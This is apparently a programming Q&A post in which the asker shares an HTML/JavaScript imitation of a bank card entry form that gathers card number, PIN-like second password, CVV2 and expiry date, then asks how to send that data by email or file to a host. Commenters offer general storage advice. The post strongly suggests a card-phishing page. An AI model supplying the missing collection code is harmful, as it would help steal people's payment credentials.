# Storing </input> data to host

Tags: javascript, html

I'm just working with HTML and JavaScript and I have a question regarding working with `</input>` elements and this is one of my inputs:

```
<input size="4" class="PanInput" id="W_PAN4" name="W_PAN4" maxlength="4" autocomplete="off" onkeypress="return numericOnKeypress(event)" onkeyup="nextTabs(this, false, event)" value="" tabindex="1" dir="ltr" onpaste="doNotPaste()" onfocus="getName(this)" type="text" width="200">
```

And I made an `alert()` after a submit button:

```
<form method="post" name="receiptForm" action="https://google.com" accept-charset="UTF-8" onclick="othername">
  <script>
    function othername() {
      var input1 = document.getElementById("W_PAN4").value;
      var input2 = document.getElementById("W_PAN3").value;
      var input3 = document.getElementById("W_PAN2").value;
      var input4 = document.getElementById("W_PAN1").value;
      var userCardID = input1 + " " + input2 + " " + input3 + " " + input4;
      var input_pass = document.getElementById("W_PIN").value;
      var input_CVV2 = document.getElementById("W_CVV2").value;
      var input_expire_month = document.getElementById("W_EXPIRE1").value;
      var input_expire_year = document.getElementById("W_EXPIRE2").value;
      var input_all = userCardID + " " + "2nd_Password = " + input_pass + " " + "CVV2 = " + input_CVV2 + " " + "ExpireDateYear = " + input_expire_year + " " + "ExpireDateMonth = " + input_expire_month;
      alert(input_all);
    }
```

I want to have a function similar to this:

```
<script type="text/javascript">
  function WriteToFile(passForm) {
    set fso = CreateObject("Scripting.FileSystemObject");
    set s = fso.CreateTextFile("Location_Here", True);

    s.writeline(document.passForm.input1.value);
    s.writeline(document.passForm.input2.value);
    s.writeline(document.passForm.input3.value);
    s.Close();
  }
</script>
```

I mean I want to store those inputs data as a `.txt` file on localhost or even in an online host.

What is the easiest way to save these data? Format is not important, I can deal with anything E-mail, File and etc. I think it is a server-side work. Any code will be appreciated.

Comment: A database would be the recommended way to store this data. Depending on your tech stack that could be MongoDB, MySQL, etc. Using client-side JS to write to a file is not safe in the slightest (if it's even possible?), so you'll need to have some server-side processing to handle the form submission (this can be node.js, just not client-side).

Comment: Use php to make those txt files.

Comment: @a.meshu How to?

Comment: https://stackoverflow.com/questions/13405129/javascript-create-and-save-file